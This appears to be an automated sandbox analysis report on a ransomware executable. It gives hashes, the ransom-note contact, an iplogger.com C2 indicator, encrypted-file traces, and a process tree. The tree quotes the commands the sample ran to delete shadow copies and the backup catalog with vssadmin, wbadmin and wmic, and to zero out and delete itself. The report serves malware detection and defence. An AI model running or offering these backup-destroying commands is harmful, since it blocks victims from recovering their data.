Overview
overview
10Static
static
1055c30024ae...15.exe
windows7-x64
1055c30024ae...15.exe
windows7-x64
1055c30024ae...15.exe
windows10-2004-x64
1055c30024ae...15.exe
windows10-ltsc_2021-x64
1055c30024ae...15.exe
windows11-21h2-x64
1056f7b48f38...59.exe
windows10-2004-x64
1056f7b48f38...59.exe
windows7-x64
1056f7b48f38...59.exe
windows10-2004-x64
1056f7b48f38...59.exe
windows10-ltsc_2021-x64
1056f7b48f38...59.exe
windows11-21h2-x64
105a96b92938...a4.exe
windows11-21h2-x64
105a96b92938...a4.exe
windows7-x64
105a96b92938...a4.exe
windows10-2004-x64
105a96b92938...a4.exe
windows10-ltsc_2021-x64
105a96b92938...a4.exe
windows11-21h2-x64
10606b88fce1...c4.exe
windows10-2004-x64
3606b88fce1...c4.exe
windows7-x64
1606b88fce1...c4.exe
windows10-2004-x64
3606b88fce1...c4.exe
windows10-ltsc_2021-x64
3606b88fce1...c4.exe
windows11-21h2-x64
36bda9faf71...4b.exe
windows11-21h2-x64
106bda9faf71...4b.exe
windows7-x64
106bda9faf71...4b.exe
windows10-2004-x64
106bda9faf71...4b.exe
windows10-ltsc_2021-x64
106bda9faf71...4b.exe
windows11-21h2-x64
1071b46e95fb...a8.exe
windows11-21h2-x64
1071b46e95fb...a8.exe
windows7-x64
1071b46e95fb...a8.exe
windows10-2004-x64
1071b46e95fb...a8.exe
windows10-ltsc_2021-x64
1071b46e95fb...a8.exe
windows11-21h2-x64
10Resubmissions
25/03/2025, 13:12 UTC
250325-qfl42aznw9 1025/03/2025, 13:09 UTC
250325-qdtq4aznv6 1025/03/2025, 13:05 UTC
250325-qbtcjszns3 1025/03/2025, 13:01 UTC
250325-p9k86awxat 1025/03/2025, 12:55 UTC
250325-p58tnawwe1 1025/03/2025, 12:51 UTC
250325-p3txqazmt6 1005/02/2025, 11:16 UTC
250205-ndjvsavrdm 1016/07/2024, 08:54 UTC
240716-kt64gavakp 10Analysis
-
max time kernel
99s -
max time network
104s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/03/2025, 13:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe
Resource
win7-20241010-en
Behavioral task
behavioral3
Sample
55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral5
Sample
55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe
Resource
win11-20250313-en
Behavioral task
behavioral6
Sample
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral7
Sample
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral9
Sample
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral10
Sample
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Resource
win11-20250314-en
Behavioral task
behavioral11
Sample
5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe
Resource
win11-20250314-en
Behavioral task
behavioral12
Sample
5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe
Resource
win7-20241010-en
Behavioral task
behavioral13
Sample
5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral14
Sample
5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral15
Sample
5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe
Resource
win11-20250313-en
Behavioral task
behavioral16
Sample
606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral17
Sample
606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral19
Sample
606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral20
Sample
606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe
Resource
win11-20250314-en
Behavioral task
behavioral21
Sample
6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe
Resource
win11-20250313-en
Behavioral task
behavioral22
Sample
6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral24
Sample
6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral25
Sample
6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe
Resource
win11-20250313-en
Behavioral task
behavioral26
Sample
71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe
Resource
win11-20250313-en
Behavioral task
behavioral27
Sample
71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral29
Sample
71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral30
Sample
71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe
Resource
win11-20250313-en
General
-
Target
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
-
Size
42KB
-
MD5
abb04a0418be9cc4618f393d7fc9d76b
-
SHA1
dbe3b07ab1383e4d693bb6cab17ad8a7c1c5cd7b
-
SHA256
56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659
-
SHA512
f7bce71f01ffae675a8b8a23a8f2e4d162ccefc349beadb84ffcca890dc68ed636acf4f7d694145c779125078f6634f30aed5f5651ee6c12dc4768f7c0a0f47b
-
SSDEEP
768:QO1oR/8VS1RzK4wbs+D/SIJX+ZZ1SQQwZuIOPzDsHw67ZY23IWSjNV:QgS1FKnDtkuImsHw6V73ejNV
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt
ardellchadwick275@msgsafe.io
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (8309) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2832 wbadmin.exe -
Deletes itself 1 IoCs
pid Process 2044 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 iplogger.com 5 iplogger.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\318E.tmp.bmp" 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.[74B92775].[ardellchadwick275@msgsafe.io].mkp 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\+README-WARNING+.txt 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\+README-WARNING+.txt 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\PREVIEW.GIF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\JOURNAL.ELM 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\webcompat-reporter@mozilla.org.xpi 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\BLUECALM.INF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199465.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00395_.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File created C:\Program Files\Microsoft Games\Purble Place\ja-JP\+README-WARNING+.txt 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Country.css 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\highDpiImageSwap.js 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File created C:\Program Files\Microsoft Games\Solitaire\ja-JP\+README-WARNING+.txt 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SATIN\THMBNAIL.PNG 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialResume.dotx 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\DVD Maker\Shared\DissolveAnother.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Mozilla Firefox\locale.ini 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Waitcursor.gif 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\main.html 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe Root Certificate.cer 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER.XML 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2044 cmd.exe 2388 PING.EXE -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2984 vssadmin.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2388 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeBackupPrivilege 2768 vssvc.exe Token: SeRestorePrivilege 2768 vssvc.exe Token: SeAuditPrivilege 2768 vssvc.exe Token: SeBackupPrivilege 2748 wbengine.exe Token: SeRestorePrivilege 2748 wbengine.exe Token: SeSecurityPrivilege 2748 wbengine.exe Token: SeIncreaseQuotaPrivilege 2644 WMIC.exe Token: SeSecurityPrivilege 2644 WMIC.exe Token: SeTakeOwnershipPrivilege 2644 WMIC.exe Token: SeLoadDriverPrivilege 2644 WMIC.exe Token: SeSystemProfilePrivilege 2644 WMIC.exe Token: SeSystemtimePrivilege 2644 WMIC.exe Token: SeProfSingleProcessPrivilege 2644 WMIC.exe Token: SeIncBasePriorityPrivilege 2644 WMIC.exe Token: SeCreatePagefilePrivilege 2644 WMIC.exe Token: SeBackupPrivilege 2644 WMIC.exe Token: SeRestorePrivilege 2644 WMIC.exe Token: SeShutdownPrivilege 2644 WMIC.exe Token: SeDebugPrivilege 2644 WMIC.exe Token: SeSystemEnvironmentPrivilege 2644 WMIC.exe Token: SeRemoteShutdownPrivilege 2644 WMIC.exe Token: SeUndockPrivilege 2644 WMIC.exe Token: SeManageVolumePrivilege 2644 WMIC.exe Token: 33 2644 WMIC.exe Token: 34 2644 WMIC.exe Token: 35 2644 WMIC.exe Token: SeIncreaseQuotaPrivilege 2644 WMIC.exe Token: SeSecurityPrivilege 2644 WMIC.exe Token: SeTakeOwnershipPrivilege 2644 WMIC.exe Token: SeLoadDriverPrivilege 2644 WMIC.exe Token: SeSystemProfilePrivilege 2644 WMIC.exe Token: SeSystemtimePrivilege 2644 WMIC.exe Token: SeProfSingleProcessPrivilege 2644 WMIC.exe Token: SeIncBasePriorityPrivilege 2644 WMIC.exe Token: SeCreatePagefilePrivilege 2644 WMIC.exe Token: SeBackupPrivilege 2644 WMIC.exe Token: SeRestorePrivilege 2644 WMIC.exe Token: SeShutdownPrivilege 2644 WMIC.exe Token: SeDebugPrivilege 2644 WMIC.exe Token: SeSystemEnvironmentPrivilege 2644 WMIC.exe Token: SeRemoteShutdownPrivilege 2644 WMIC.exe Token: SeUndockPrivilege 2644 WMIC.exe Token: SeManageVolumePrivilege 2644 WMIC.exe Token: 33 2644 WMIC.exe Token: 34 2644 WMIC.exe Token: 35 2644 WMIC.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2132 wrote to memory of 2128 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 31 PID 2132 wrote to memory of 2128 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 31 PID 2132 wrote to memory of 2128 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 31 PID 2132 wrote to memory of 2128 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 31 PID 2128 wrote to memory of 2984 2128 cmd.exe 33 PID 2128 wrote to memory of 2984 2128 cmd.exe 33 PID 2128 wrote to memory of 2984 2128 cmd.exe 33 PID 2128 wrote to memory of 2832 2128 cmd.exe 36 PID 2128 wrote to memory of 2832 2128 cmd.exe 36 PID 2128 wrote to memory of 2832 2128 cmd.exe 36 PID 2128 wrote to memory of 2644 2128 cmd.exe 40 PID 2128 wrote to memory of 2644 2128 cmd.exe 40 PID 2128 wrote to memory of 2644 2128 cmd.exe 40 PID 2132 wrote to memory of 2044 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 46 PID 2132 wrote to memory of 2044 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 46 PID 2132 wrote to memory of 2044 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 46 PID 2132 wrote to memory of 2044 2132 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe 46 PID 2044 wrote to memory of 2388 2044 cmd.exe 48 PID 2044 wrote to memory of 2388 2044 cmd.exe 48 PID 2044 wrote to memory of 2388 2044 cmd.exe 48 PID 2044 wrote to memory of 2388 2044 cmd.exe 48 PID 2044 wrote to memory of 1772 2044 cmd.exe 49 PID 2044 wrote to memory of 1772 2044 cmd.exe 49 PID 2044 wrote to memory of 1772 2044 cmd.exe 49 PID 2044 wrote to memory of 1772 2044 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"1⤵
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" n21322⤵
- System Location Discovery: System Language Discovery
PID:2292
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2984
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet3⤵
- Deletes backup catalog
PID:2832
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" & del /q /f "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2388
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1772
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3036
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2756
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1088
Network
-
